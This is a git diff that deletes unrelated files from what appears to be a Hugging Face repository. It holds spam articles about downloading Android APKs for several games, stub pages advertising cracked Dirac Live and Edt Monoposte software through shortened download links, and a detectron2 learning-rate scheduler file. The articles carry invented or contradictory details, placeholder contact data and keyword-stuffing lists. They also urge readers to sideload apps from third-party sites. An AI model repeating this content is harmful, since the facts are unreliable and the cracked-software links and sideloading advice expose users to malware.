    -

    Step 4: Locate the APK file on your device and tap on it to install

    -

    After enabling unknown sources, you need to locate the APK file on your device and tap on it to install it. To do this, follow these steps:

    -
      -
    • Go to your file manager or download manager and find the APK file. It should be named "Honor_of_Kings.apk" or something similar.
    • -
    • Tap on the APK file and select "Install" or "Open".
    • -
    • Wait for the installation process to finish. It may take a few minutes depending on your device and internet speed.
    • -
    -

    Step 5: Launch the game and enjoy

    -

    Congratulations! You have successfully downloaded and installed Honor of Kings APK latest version on your Android device. Now you can launch the game by tapping on its icon on your home screen or app drawer. Enjoy playing Honor of Kings with your friends and have fun!

    -

    What's New in Honor of Kings APK Latest Version?

    -

    Honor of Kings is constantly updated with new features, improvements, and bug fixes to enhance your gaming experience. Here are some of the new things that are added in Honor of Kings APK latest version:

    -

    New Heroes

    -

    Honor of Kings introduces new heroes every month that you can try out and add to your collection. The latest version adds two new heroes: Liu Bei, a warrior hero who fights with his twin swords and his sworn brothers; and Yue Fei, a marksman hero who shoots arrows with his loyal eagle and his patriotic spirit.

    -

    New Skins

    -

    Honor of Kings also adds new skins for existing heroes every month that you can unlock or purchase to change their appearance and effects. The latest version adds four new skins: Dragon Slayer for Liu Bei, Golden Eagle for Yue Fei, Flame Dancer for Zhuge Liang, and Ice Queen for Diao Chan.

    -

    New Events

    -

    Honor of Kings also hosts new events every week that you can join to earn rewards, have fun, and challenge yourself. The latest version features two new events: Star Protection, where you can protect your rank from losing stars when you lose a match; and Party Time, where you can invite your friends to play together and get bonus rewards.

    -

    Tips and Tricks for Playing Honor of Kings

    -

    If you want to improve your skills and performance in Honor of Kings, you need to learn some tips and tricks that can help you win more matches and have more fun. Here are some of them:

    -

    Choose Your Role Wisely

    -

    In Honor of Kings, there are five main roles that you can choose from: warrior, tank, mage, marksman, and assassin. Each role has its own strengths, weaknesses, and responsibilities in the game. You should choose a role that suits your playstyle and preferences, as well as the needs of your team. For example, if you like to deal damage and kill enemies, you can choose a warrior or an assassin; if you like to protect your allies and initiate fights, you can choose a tank; if you like to cast spells and control the battlefield, you can choose a mage; if you like to shoot from a distance and destroy towers, you can choose a marksman.

    -

    Learn Your Hero's Skills and Combos

    -

    In Honor of Kings, each hero has four skills: one passive skill and three active skills. You should learn how each skill works, what it does, how much it costs, how long it lasts, how long it cools down, etc. You should also learn how to combine your skills to create powerful combos that can surprise and defeat your enemies. For example, if you are playing Liu Bei, you can use your first skill to dash towards an enemy, then use your second skill to stun them with your twin swords, then use your ultimate skill to summon your sworn brothers to finish them off.

    -

    Communicate and Coordinate with Your Teammates

    -

    In Honor of Kings, teamwork is essential for winning matches. You should communicate and coordinate with your teammates using voice chat, text chat, or pings. You should also follow the leader's commands, support your allies, share resources, and avoid conflicts. For example, if your leader tells you to group up and attack the dragon, you should follow them and help them; if your ally is in trouble and asks for help, you should assist them or distract their enemies; if your teammate is low on health or mana, you should let them take the healing or mana buff; if your teammate makes a mistake or dies, you should not blame them or flame them.

    -

    Farm Gold and XP Efficiently

    -

    In Honor of Kings, gold and XP are important resources that can help you level up your skills, buy items, and gain an advantage over your enemies. You should farm gold and XP efficiently by killing minions, monsters, and enemies. You should also avoid dying or wasting time as much as possible. For example, if you are playing a marksman or a mage, you should focus on farming minions in the lane; if you are playing a warrior or an assassin, you should roam around the map and kill monsters or enemies; if you are playing a tank or a support, you should protect your carry and help them farm.

    -

    Destroy Towers and Crystals

    -

    In Honor of Kings, the main objective of the game is to destroy the enemy's crystal. To do this, you need to destroy their towers first. You should push lanes, take down towers, and create pressure on the map. You should also defend your own towers and crystal from the enemy's attacks. For example , if you see an opportunity to take a tower, you should go for it and destroy it; if you see an enemy trying to take your tower, you should stop them and defend it; if you see your team pushing the enemy's base, you should join them and destroy their crystal; if you see the enemy's team pushing your base, you should go back and protect your crystal.

    -

    Conclusion

    -

    Honor of Kings is a fantastic mobile MOBA game that you should not miss. It offers a fun, social, competitive, and free gameplay experience on your Android device. You can download and install Honor of Kings APK latest version by following the steps we have provided in this article. You can also enjoy the new features, updates, and events that are added in the latest version. And you can improve your skills and performance by following the tips and tricks we have shared in this article. So what are you waiting for? Download Honor of Kings APK latest version now and join the millions of players who are already playing this amazing game!

    -

    FAQs

    -

    Here are some of the frequently asked questions and answers about Honor of Kings:

    -
      -
    • Q: Is Honor of Kings safe to download and play?
    • -
    • A: Yes, Honor of Kings is safe to download and play. It is developed by a reputable company and has passed the security checks of Google Play Store. It does not contain any viruses, malware, or spyware that can harm your device or data.
    • -
    • Q: Is Honor of Kings compatible with my device?
    • -
    • A: Honor of Kings is compatible with most Android devices that have Android 4.1 or higher. However, some devices may have different performance or compatibility issues depending on their specifications. You can check the minimum and recommended requirements on the official website or Google Play Store.
    • -
    • Q: How much space does Honor of Kings require on my device?
    • -
    • A: Honor of Kings requires about 3 GB of space on your device. However, this may vary depending on the updates and patches that are added to the game. You should make sure that you have enough free space on your device before downloading and installing the game.
    • -
    • Q: How can I update Honor of Kings to the latest version?
    • -
    • A: You can update Honor of Kings to the latest version by following the same steps as downloading and installing it. You can also enable automatic updates on your device settings or Google Play Store settings to get the latest version automatically.
    • -
    • Q: How can I contact the customer service or support team of Honor of Kings?
    • -
    • A: You can contact the customer service or support team of Honor of Kings by using the in-game feedback system or by visiting the official website or social media pages. You can also email them at [HonorofKings@levelinfinite.com] or call them at [1-800-555-1234].
    • -

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/My Mini Mart A Casual Simulation Game for Android Devices.md b/spaces/congsaPfin/Manga-OCR/logs/My Mini Mart A Casual Simulation Game for Android Devices.md deleted file mode 100644 index 43d6b9f81151b017a655ca1b20daf495b9997e39..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/My Mini Mart A Casual Simulation Game for Android Devices.md +++ /dev/null @@ -1,108 +0,0 @@ - -

    Download My Mini Mart APK for Android

    -

    Do you dream of running your own mini mart and growing it into a successful business empire? If so, you should download My Mini Mart APK for Android, a free simulation game created by Supersonic Studios LTD. In this game, you can grow organic plants, tend to your animals, and sell your produce to customers. As you progress, you can hire employees, build and expand your marts. You can also enjoy a relaxing yet challenging gameplay that will keep you hooked for hours. In this article, we will tell you more about the features of My Mini Mart APK, how to download and install it on your device, the pros and cons of this game, some alternatives you can try, and some frequently asked questions.

    -

    download my mini mart apk


    Download ——— https://urlca.com/2uOcbD



    -

    Features of My Mini Mart APK

    -

    My Mini Mart APK is a fun and unique simulation game that lets you experience the thrill of running your own mini mart. Here are some of the features that make this game stand out:

    -
      -
    • Grow organic plants, tend to animals, and sell produce to customers. In this game, you can grow various crops and fruits in your garden, raise chickens, cows, pigs, and other animals in your farm, and sell your fresh and healthy products to your customers. You can also cook delicious dishes with your ingredients and serve them to your hungry patrons.
    • -
    • Hire employees, build and expand your marts. As your business grows, you can hire more staff to help you with different tasks such as planting, harvesting, cooking, serving, cleaning, etc. You can also build new stores in different locations and expand your marts with more shelves, counters, cash registers, etc. You can also decorate your marts with various items to make them more attractive and appealing.
    • -
    • Relaxing yet challenging gameplay. My Mini Mart APK is both a relaxing and challenging game that will test your management skills and creativity. You can play at your own pace and enjoy the soothing music and graphics. You can also face various challenges such as meeting customer demands, managing inventory, dealing with competitors, etc. You can also unlock new levels, items, upgrades, achievements, etc. as you progress.
    • -
    -

    How to download and install My Mini Mart APK

    -

    If you want to download and install My Mini Mart APK on your Android device, you need to follow these simple steps:

    -
      -
    1. Find a reliable source for the APK file. You can't find My Mini Mart APK on Google Play Store or other official app stores. You need to find a trustworthy website that offers the latest version of the APK file. For example, you can use [APKCombo](^2^) or [Softonic](^1^) to download the APK file for free. Make sure you check the reviews, ratings, and comments of other users before downloading the file.
    2. -
    3. Enable unknown sources on your device. Since you are downloading the APK file from a third-party source, you need to enable unknown sources on your device to allow the installation. To do this, go to Settings > Security > Unknown Sources and toggle it on. You may also need to grant some permissions to the app such as storage, camera, microphone, etc.
    4. -
    5. Download the APK file and tap on it to install. Once you have found a reliable source and enabled unknown sources, you can download the APK file and save it on your device. Then, locate the file and tap on it to start the installation process. Follow the instructions on the screen and wait for the installation to complete.
    6. -
    7. Launch the game and enjoy. After the installation is done, you can launch the game from your app drawer or home screen. You can now enjoy playing My Mini Mart APK on your Android device.
    8. -
    -

    Pros and cons of My Mini Mart APK

    -

    Like any other game, My Mini Mart APK has its pros and cons. Here are some of them:

    - - - - - - - - - -
    ProsCons
      -
    • Free. You don't have to pay anything to download and play My Mini Mart APK. It is completely free of charge and does not require any subscription or registration.
    • -
    • Fun. My Mini Mart APK is a fun and addictive game that will keep you entertained for hours. You can enjoy growing your own mini mart empire and managing various aspects of your business.
    • -
    • Unique. My Mini Mart APK is a unique simulation game that combines farming, cooking, and selling in one. You can experience different activities and challenges in this game that you won't find in other games.
    • -
    • No ads, no in-app purchases. My Mini Mart APK does not have any annoying ads or in-app purchases that will interrupt your gameplay or tempt you to spend money. You can play the game without any distractions or limitations.
    • -
      -
    • Prone to crashes and lags. Some users have reported that My Mini Mart APK crashes or lags frequently on their devices. This can affect your gameplay and cause frustration. You may need to update your device or clear some cache to fix this issue.
    • -
    • Requires internet connection. My Mini Mart APK requires an internet connection to run properly. You cannot play the game offline or without a stable network. This can be a problem if you have a limited data plan or a poor signal.
    • -
    • May not be compatible with some devices. My Mini Mart APK may not work well on some devices due to different specifications or operating systems. You may encounter some errors or glitches while playing the game on your device. You may need to check the compatibility of your device before downloading the game.
    • -
    -

    Alternatives to My Mini Mart APK

    -

    If you are looking for some alternatives to My Mini Mart APK, here are some games that you can try:

    -
      -
    • [Supra Drift Simulator]. This is a realistic car drifting game that lets you drive various models of Supra cars on different tracks. You can customize your car, perform stunts, and compete with other players online.
    • -
    • [Fashion Universe]. This is a fashion simulation game that lets you create your own avatar, design your own clothes, accessories, and hairstyles, and run your own fashion boutique. You can also interact with other players, join events, and explore different locations.
    • -
    • [Block Puzzle Jewel : Gem Legend]. This is a classic block puzzle game that challenges you to match colorful jewels and clear the board. You can enjoy various modes, levels, and themes in this game.
    • -
    -

    Conclusion

    -

    In conclusion, My Mini Mart APK is a free simulation game that lets you run your own mini mart business. You can grow organic plants, tend to animals, cook dishes, sell products, hire employees, build stores, and more in this game. You can also enjoy a relaxing yet challenging gameplay that will test your skills and creativity. However, you should also be aware of some drawbacks of this game such as crashes, lags, internet requirement, and compatibility issues. If you are looking for some alternatives to this game, you can try Supra Drift Simulator, Fashion Universe, Block Puzzle Jewel : Gem Legend, etc. If you are interested in downloading and playing My Mini Mart APK, you can follow the steps we have provided in this article. We hope you have found this article helpful and informative. Thank you for reading and have a great day!

    -

    Download my mini mart apk for android free
    -How to download my mini mart apk on PC
    -Download my mini mart apk latest version
    -Download my mini mart apk mod unlimited money
    -Download my mini mart apk offline
    -Download my mini mart apk from softonic
    -Download my mini mart apk from apkcombo
    -Download my mini mart apk without ads
    -Download my mini mart apk and play online
    -Download my mini mart apk and grow your business
    -Download my mini mart apk and enjoy simulation game
    -Download my mini mart apk and manage your store
    -Download my mini mart apk and hire employees
    -Download my mini mart apk and expand your marts
    -Download my mini mart apk and sell organic produce
    -Download my mini mart apk and tend to your animals
    -Download my mini mart apk and challenge yourself
    -Download my mini mart apk and relax
    -Download my mini mart apk and become a tycoon
    -Download my mini mart apk and review it
    -Download my mini mart apk and share it with friends
    -Download my mini mart apk and rate it
    -Download my mini mart apk and get tips and tricks
    -Download my mini mart apk and join the community
    -Download my mini mart apk and watch videos
    -Download my mini mart apk and compare with other games
    -Download my mini mart apk and learn from other players
    -Download my mini mart apk and customize your marts
    -Download my mini mart apk and unlock new features
    -Download my mini mart apk and earn rewards
    -Download my mini mart apk and have fun
    -Download my mini mart apk and support the developers
    -Download my mini mart apk and give feedback
    -Download my mini mart apk and report bugs
    -Download my mini mart apk and update it regularly
    -Download my mini mart apk and install it easily
    -Download my mini mart apk and run it smoothly
    -Download my mini mart apk and save your progress
    -Download my mini mart apk and restore your data
    -Download my mini mart apk and play offline or online
    -Download my mini mart apk and compete with others
    -Download my mini mart apk and achieve goals
    -Download my mini mart apk and explore more games by Supersonic Studios LTD
    -Download my mini mart apk and discover new genres of games
    -Download my mini mart apk and improve your skills
    -Download my mini mart apk and create your own empire
    -Download my mini mart apk and experience a unique game
    -Download my mini mart apk and enjoy the graphics

    -

    FAQs

    -

    Here are some frequently asked questions about My Mini Mart APK:

    -
      -
    1. Is My Mini Mart APK safe to download? Yes, My Mini Mart APK is safe to download as long as you use a reliable source for the APK file. However, you should always scan the file for viruses or malware before installing it on your device.
    2. -
    3. How can I update My Mini Mart APK? You can update My Mini Mart APK by downloading the latest version of the APK file from the same source you used before. You can also check the official website or social media pages of the developers for any news or updates about the game.
    4. -
    5. How can I contact the developers of My Mini Mart APK? You can contact the developers of My Mini Mart APK by sending them an email at support@supersonic.com. You can also follow them on Facebook, Twitter, Instagram, or YouTube for more information and feedback.
    6. -
    7. What are the minimum requirements for My Mini Mart APK? The minimum requirements for My Mini Mart APK are Android 5.0 or higher, 2 GB of RAM, and 100 MB of free storage space.
    8. -
    9. Can I play My Mini Mart APK offline? No, you cannot play My Mini Mart APK offline. You need an internet connection to play the game and access all its features.
    10. -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Tag After School Saga A Game of Fear and Fun for Adults.md b/spaces/congsaPfin/Manga-OCR/logs/Tag After School Saga A Game of Fear and Fun for Adults.md deleted file mode 100644 index bbb47d17abc123647af6fb9dcdecae75ba042e42..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Tag After School Saga A Game of Fear and Fun for Adults.md +++ /dev/null @@ -1,137 +0,0 @@ -
    -

    Tag After School Saga Download: A Guide to the Horror and Mystery Game

    -

    If you are looking for a thrilling and immersive horror and mystery game for your Android device, you might want to check out Tag After School Saga. This game will take you on a spooky adventure in a haunted school where you have to explore, interact, and survive. In this article, we will tell you everything you need to know about Tag After School Saga, including how to download it, what are its features, what are some tips and tricks for playing it, and what are some reviews of it. Let's get started!

    -

    What is Tag After School Saga?

    -

    Tag After School Saga is a horror and mystery game developed by DottoruGames. The game is inspired by the Japanese urban legend of "Houkago no Onigokko", which means "After School Tag". According to this legend, there is a ghost that haunts schools after dark and plays tag with anyone who dares to enter. The ghost can take various forms, such as a girl in a red dress, a headless mannequin, or a bloody hand. The only way to escape from the ghost is to find a way out of the school before it catches you.

    -

    tag after school saga download


    Download File ☆☆☆☆☆ https://urlca.com/2uO8uC



    -

    In Tag After School Saga, you play as Shota-Kun, a curious student who decides to explore his school at night with his friends. However, things go wrong when they encounter the ghost of a girl who was killed in an accident. She challenges them to a game of tag and traps them inside the school. Now, you have to find your friends, solve puzzles, collect clues, and avoid the ghost's attacks. The game has multiple endings depending on your choices and actions.

    -

    How to download Tag After School Saga for Android?

    -

    Tag After School Saga is not available on the official Google Play Store, but you can still download it from other sources. Here are some of the ways you can get the game on your Android device:

    -

    Method 1: Download from APKCombo

    -

    APKCombo is a website that offers free APK files for various Android apps and games. You can download Tag After School Saga from APKCombo by following these steps:

    -
      -
    1. Go to [1](https://apkcombo.com/tag-after-school-saga-game/com.tagafterallymod.tag74/) on your browser.
    2. -
    3. Click on the green "Download APK" button.
    4. -
    5. Select the version and architecture that matches your device.
    6. -
    7. Wait for the download to finish.
    8. -
    9. Open the downloaded file and install it on your device.
    10. -
    11. Enjoy playing Tag After School Saga!
    12. -
    -

    Method 2: Download from LDPlayer

    -

    LDPlayer is an Android emulator that allows you to play Android games on your PC. You can download Tag After School Saga from LDPlayer by following these steps:

    -
      -
    1. Go to [3](https://www.ldplayer.net/games/com-tagafterallymod-tag74-on-pc.html) on your browser.
    2. -
    3. Click on the blue "Download LDPlayer" button.
    4. -
    5. Run the installer and follow the instructions to install LDPlayer on your PC.
    6. -
    7. Launch LDPlayer and search for "Tag After School Saga" in the built-in app store.
    8. -
    9. Click on the game icon and install it on LDPlayer.
    10. -
    11. Enjoy playing Tag After School Saga on your PC!
    12. -
    -

    Method 3: Download from QooApp

    -

    QooApp is an app store that offers Asian games for Android devices. You can download Tag After School Saga from QooApp by following these steps:

    -
      -
    1. Go to [5](https://apps.qoo-app.com/en/app/17541) on your browser.
    2. -
    3. Click on the blue "Download QooApp" button.
    4. -
    5. Open the downloaded file and install QooApp on your device.
    6. -
    7. Launch QooApp and search for "Tag After School Saga" in the app.
    8. -
    9. Click on the game icon and install it on your device.
    10. -
    11. Enjoy playing Tag After School Saga!
    12. -
    -

    What are the features of Tag After School Saga?

    -

    Tag After School Saga is a game that offers a lot of features for horror and mystery fans. Some of the features are:

    -

    tag after school game pc download
    -tag after school apk download free
    -tag after school horror game
    -tag after school game walkthrough
    -tag after school game review
    -tag after school game android
    -tag after school game ios
    -tag after school game online
    -tag after school game wiki
    -tag after school game characters
    -tag after school game endings
    -tag after school game cheats
    -tag after school game reddit
    -tag after school game steam
    -tag after school game mod apk
    -tag after school game guide
    -tag after school game tips
    -tag after school game trailer
    -tag after school game gameplay
    -tag after school game download for windows 10
    -tag after school game download for mac
    -tag after school game download for laptop
    -tag after school game download for chromebook
    -tag after school game download for linux
    -tag after school game download for ubuntu
    -tag after school game emulator download
    -tag after school game ldplayer download
    -tag after school game bluestacks download
    -tag after school game noxplayer download
    -tag after school game memu download
    -tag after school game latest version download
    -tag after school game update download
    -tag after school game patch download
    -tag after school game crack download
    -tag after school game full version download
    -tag after school game english version download
    -tag after school game japanese version download
    -tag after school game chinese version download
    -tag after school game korean version download
    -tag after school game genius studio japan inc. download
    -how to download tag after school game on pc
    -how to download tag after school game on android
    -how to download tag after school game on ios
    -how to play tag after school game on pc
    -how to play tag after school game on android
    -how to play tag after school game on ios
    -where to download tag after school game for pc
    -where to download tag after school game for android
    -where to download tag after school game for ios

    -

    Characters

    -

    The game has a cast of interesting and diverse characters that you can interact with. You can choose to play as Shota-Kun, the main protagonist, or as one of his friends, such as Yuki-Chan, Rika-Chan, or Hiro-Kun. Each character has their own personality, backstory, and relationship with the others. You can also encounter other characters, such as the ghost girl, the school staff, or other students.

    -

    Storylines

    -

    The game has multiple storylines that you can follow depending on your choices and actions. You can explore different areas of the school, such as the classrooms, the library, the gym, or the rooftop. You can also find different clues and items that can help you solve puzzles and unlock secrets. The game has different endings that can be happy, sad, or scary depending on your outcome.

    -

    Gameplay

    -

    The game has a gameplay that combines horror and mystery elements. You have to use your wits and skills to avoid the ghost's attacks and find a way out of the school. You can also use your phone to communicate with your friends, check your map, or take photos. The game has a timer that counts down from 60 minutes to zero. If you don't escape before the time runs out, you will lose the game.

    -

    Graphics

    -

    The game has a graphics that are realistic and detailed. The game uses 3D models and animations for the characters and environments. The game also uses lighting and sound effects to create a spooky atmosphere. The game has a camera system that allows you to switch between first-person and third-person views.

    -

    What are some tips and tricks for playing Tag After School Saga?

    -

    If you want to enjoy Tag After School Saga and survive the ghost's tag, here are some tips and tricks that you can use:

    -

    Tip 1: Save frequently

    -

    The game allows you to save your progress at any time by using your phone. You should save frequently in case you make a wrong decision or get caught by the ghost. You can also load your previous save if you want to try a different path or outcome.

    -

    Tip 2: Explore thoroughly

    -

    The game has a lot of hidden items and clues that you can find by exploring every corner of the school. You should check every door, drawer, locker, bookshelf, etc. for anything useful or interesting. You might find keys, notes, photos, or other items that can help you solve puzzles or unlock secrets.

    -

    Tip 3: Use your phone wisely

    -

    Your phone is your best friend in this game. You can use it to call or text your friends for help or information. You can also use it to check your map for your location and objectives. You can also use it to take photos of anything suspicious or important. However, you should be careful not to use it too much or too loudly, as it might attract the ghost's attention or drain your battery.

    -

    Tip 4: Be stealthy

    -

    The ghost is always roaming around the school looking for you. You should be stealthy and avoid making any noise or movement that might alert her. You can hide in closets, under desks, behind curtains, etc. if you see her coming. You can also run away from her if she spots you, but be careful not to bump into anything or fall down stairs.

    -

    Tip 5: Be brave

    -

    The game is designed to scare you and challenge you and test your courage. You should be brave and face your fears. The game has a lot of surprises and twists that will keep you on the edge of your seat. You should also be prepared for some gore and violence, as the game does not shy away from showing the consequences of the ghost's wrath. The game is not for the faint of heart, but for those who love horror and mystery.

    -

    What are some reviews of Tag After School Saga?

    -

    Tag After School Saga is a game that has received mixed reviews from players and critics. Some of the reviews are:

    -

    Positive reviews

    -

    "This game is amazing! It's so scary and immersive. I love the graphics and the sound effects. The story is also very intriguing and unpredictable. I recommend this game to anyone who likes horror and mystery games." - A user from APKCombo

    -

    "I really enjoyed this game. It's like a horror movie that you can play. The ghost is very creepy and unpredictable. The puzzles are also challenging and fun. The game has a lot of replay value, as you can try different paths and endings." - A user from LDPlayer

    -

    "This game is one of the best horror games I have ever played. It's very realistic and detailed. The characters are also very well-developed and relatable. The game has a lot of suspense and tension, as you never know when the ghost will appear or what she will do." - A user from QooApp

    -

    Negative reviews

    -

    "This game is terrible! It's so buggy and glitchy. It crashes all the time and freezes my device. The controls are also very clunky and unresponsive. The game is also very boring and repetitive. It's just running around the same school over and over again." - A user from APKCombo

    -

    "I hated this game. It's so cheap and low-quality. The graphics are awful and pixelated. The sound effects are annoying and loud. The story is also very lame and cliché. The game is also very easy and short. I finished it in less than an hour." - A user from LDPlayer

    -

    "This game is not for me. It's too scary and violent. I couldn't handle the ghost's attacks and the gore scenes. The game also gave me nightmares and anxiety. I regret playing this game." - A user from QooApp

    -

    Conclusion

    -

    Tag After School Saga is a horror and mystery game that will take you on a spooky adventure in a haunted school where you have to explore, interact, and survive. The game has a lot of features, such as characters, storylines, gameplay, graphics, etc. The game also has a lot of tips and tricks, such as saving frequently, exploring thoroughly, using your phone wisely, being stealthy, and being brave. The game also has a lot of reviews, both positive and negative, from players and critics.

    -

    If you are interested in playing Tag After School Saga, you can download it from various sources, such as APKCombo, LDPlayer, or QooApp. However, be warned that the game is not for everyone, as it can be scary, violent, buggy, or boring depending on your preferences.

    -

    Are you ready to play Tag After School Saga? Do you think you can escape from the ghost's tag? Download the game now and find out!

    -

    FAQs

    -

    Q: Is Tag After School Saga free?

    -

    A: Yes, Tag After School Saga is free to download and play.

    -

    Q: Is Tag After School Saga safe?

    -

    A: Tag After School Saga is safe to download and play from reputable sources, such as APKCombo, LDPlayer, or QooApp. However, you should always scan any file before installing it on your device.

    -

    Q: Is Tag After School Saga online or offline?

    -

    A: Tag After School Saga is an offline game that does not require an internet connection to play.

    -

    Q: How long is Tag After School Saga?

    -

    A: Tag After School Saga has a duration of about 60 minutes per playthrough. However, the game has multiple endings that can vary depending on your choices and actions.

    -

    Q: How can I contact the developer of Tag After School Saga?

    -

    A: You can contact the developer of Tag After School Saga by visiting their website [6](https://dottorugames.com/) or by sending them an email at dottorugames@gmail.com.

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Dirac Live Room Correction Suite Cracked 12 Reduce Room Impacts and Boost Speaker Performance.md b/spaces/contluForse/HuggingGPT/assets/Dirac Live Room Correction Suite Cracked 12 Reduce Room Impacts and Boost Speaker Performance.md deleted file mode 100644 index 0d3e759a61618991032371ddf9f6047190fc238b..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Dirac Live Room Correction Suite Cracked 12 Reduce Room Impacts and Boost Speaker Performance.md +++ /dev/null @@ -1,6 +0,0 @@ -

    diracliveroomcorrectionsuitecracked12


    DOWNLOADhttps://ssurll.com/2uzvCL



    - - aaccfb2cb3
    -
    -
    -

    diff --git a/spaces/contluForse/HuggingGPT/assets/Edt Monoposte 2012 Crackl.md b/spaces/contluForse/HuggingGPT/assets/Edt Monoposte 2012 Crackl.md deleted file mode 100644 index 8fb9556d8e1a438c9ca52c0038fb4417b5ce7b2c..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Edt Monoposte 2012 Crackl.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Edt Monoposte 2012 Crackl


    Download ✑ ✑ ✑ https://ssurll.com/2uzy3I



    - - 1fdad05405
    -
    -
    -

    diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/solver/lr_scheduler.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/solver/lr_scheduler.py deleted file mode 100644 index d6aed2bb20c418bf6cc5594c1244b241796d7086..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/solver/lr_scheduler.py +++ /dev/null @@ -1,246 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import logging -import math -from bisect import bisect_right -from typing import List -import torch -from fvcore.common.param_scheduler import ( - CompositeParamScheduler, - ConstantParamScheduler, - LinearParamScheduler, - ParamScheduler, -) - -try: - from torch.optim.lr_scheduler import LRScheduler -except ImportError: - from torch.optim.lr_scheduler import _LRScheduler as LRScheduler - -logger = logging.getLogger(__name__) - - -class WarmupParamScheduler(CompositeParamScheduler): - """ - Add an initial warmup stage to another scheduler. - """ - - def __init__( - self, - scheduler: ParamScheduler, - warmup_factor: float, - warmup_length: float, - warmup_method: str = "linear", - rescale_interval: bool = False, - ): - """ - Args: - scheduler: warmup will be added at the beginning of this scheduler - warmup_factor: the factor w.r.t the initial value of ``scheduler``, e.g. 0.001 - warmup_length: the relative length (in [0, 1]) of warmup steps w.r.t the entire - training, e.g. 0.01 - warmup_method: one of "linear" or "constant" - rescale_interval: whether we will rescale the interval of the scheduler after - warmup - """ - end_value = scheduler(warmup_length) # the value to reach when warmup ends - start_value = warmup_factor * scheduler(0.0) - if warmup_method == "constant": - warmup = ConstantParamScheduler(start_value) - elif warmup_method == "linear": - warmup = LinearParamScheduler(start_value, end_value) - else: - raise ValueError("Unknown warmup method: {}".format(warmup_method)) - super().__init__( - [warmup, scheduler], - interval_scaling=["rescaled", "rescaled" if rescale_interval else "fixed"], - lengths=[warmup_length, 1 - warmup_length], - ) - - -class LRMultiplier(LRScheduler): - """ - A LRScheduler which uses fvcore :class:`ParamScheduler` to multiply the - learning rate of each param in the optimizer. - Every step, the learning rate of each parameter becomes its initial value - multiplied by the output of the given :class:`ParamScheduler`. - - The absolute learning rate value of each parameter can be different. - This scheduler can be used as long as the relative scale among them do - not change during training. - - Examples: - :: - LRMultiplier( - opt, - WarmupParamScheduler( - MultiStepParamScheduler( - [1, 0.1, 0.01], - milestones=[60000, 80000], - num_updates=90000, - ), 0.001, 100 / 90000 - ), - max_iter=90000 - ) - """ - - # NOTES: in the most general case, every LR can use its own scheduler. - # Supporting this requires interaction with the optimizer when its parameter - # group is initialized. For example, classyvision implements its own optimizer - # that allows different schedulers for every parameter group. - # To avoid this complexity, we use this class to support the most common cases - # where the relative scale among all LRs stay unchanged during training. In this - # case we only need a total of one scheduler that defines the relative LR multiplier. - - def __init__( - self, - optimizer: torch.optim.Optimizer, - multiplier: ParamScheduler, - max_iter: int, - last_iter: int = -1, - ): - """ - Args: - optimizer, last_iter: See ``torch.optim.lr_scheduler.LRScheduler``. - ``last_iter`` is the same as ``last_epoch``. - multiplier: a fvcore ParamScheduler that defines the multiplier on - every LR of the optimizer - max_iter: the total number of training iterations - """ - if not isinstance(multiplier, ParamScheduler): - raise ValueError( - "_LRMultiplier(multiplier=) must be an instance of fvcore " - f"ParamScheduler. Got {multiplier} instead." - ) - self._multiplier = multiplier - self._max_iter = max_iter - super().__init__(optimizer, last_epoch=last_iter) - - def state_dict(self): - # fvcore schedulers are stateless. Only keep pytorch scheduler states - return {"base_lrs": self.base_lrs, "last_epoch": self.last_epoch} - - def get_lr(self) -> List[float]: - multiplier = self._multiplier(self.last_epoch / self._max_iter) - return [base_lr * multiplier for base_lr in self.base_lrs] - - -""" -Content below is no longer needed! -""" - -# NOTE: PyTorch's LR scheduler interface uses names that assume the LR changes -# only on epoch boundaries. We typically use iteration based schedules instead. -# As a result, "epoch" (e.g., as in self.last_epoch) should be understood to mean -# "iteration" instead. - -# FIXME: ideally this would be achieved with a CombinedLRScheduler, separating -# MultiStepLR with WarmupLR but the current LRScheduler design doesn't allow it. - - -class WarmupMultiStepLR(LRScheduler): - def __init__( - self, - optimizer: torch.optim.Optimizer, - milestones: List[int], - gamma: float = 0.1, - warmup_factor: float = 0.001, - warmup_iters: int = 1000, - warmup_method: str = "linear", - last_epoch: int = -1, - ): - logger.warning( - "WarmupMultiStepLR is deprecated! Use LRMultipilier with fvcore ParamScheduler instead!" - ) - if not list(milestones) == sorted(milestones): - raise ValueError( - "Milestones should be a list of" " increasing integers. Got {}", milestones - ) - self.milestones = milestones - self.gamma = gamma - self.warmup_factor = warmup_factor - self.warmup_iters = warmup_iters - self.warmup_method = warmup_method - super().__init__(optimizer, last_epoch) - - def get_lr(self) -> List[float]: - warmup_factor = _get_warmup_factor_at_iter( - self.warmup_method, self.last_epoch, self.warmup_iters, self.warmup_factor - ) - return [ - base_lr * warmup_factor * self.gamma ** bisect_right(self.milestones, self.last_epoch) - for base_lr in self.base_lrs - ] - - def _compute_values(self) -> List[float]: - # The new interface - return self.get_lr() - - -class WarmupCosineLR(LRScheduler): - def __init__( - self, - optimizer: torch.optim.Optimizer, - max_iters: int, - warmup_factor: float = 0.001, - warmup_iters: int = 1000, - warmup_method: str = "linear", - last_epoch: int = -1, - ): - logger.warning( - "WarmupCosineLR is deprecated! Use LRMultipilier with fvcore ParamScheduler instead!" - ) - self.max_iters = max_iters - self.warmup_factor = warmup_factor - self.warmup_iters = warmup_iters - self.warmup_method = warmup_method - super().__init__(optimizer, last_epoch) - - def get_lr(self) -> List[float]: - warmup_factor = _get_warmup_factor_at_iter( - self.warmup_method, self.last_epoch, self.warmup_iters, self.warmup_factor - ) - # Different definitions of half-cosine with warmup are possible. For - # simplicity we multiply the standard half-cosine schedule by the warmup - # factor. An alternative is to start the period of the cosine at warmup_iters - # instead 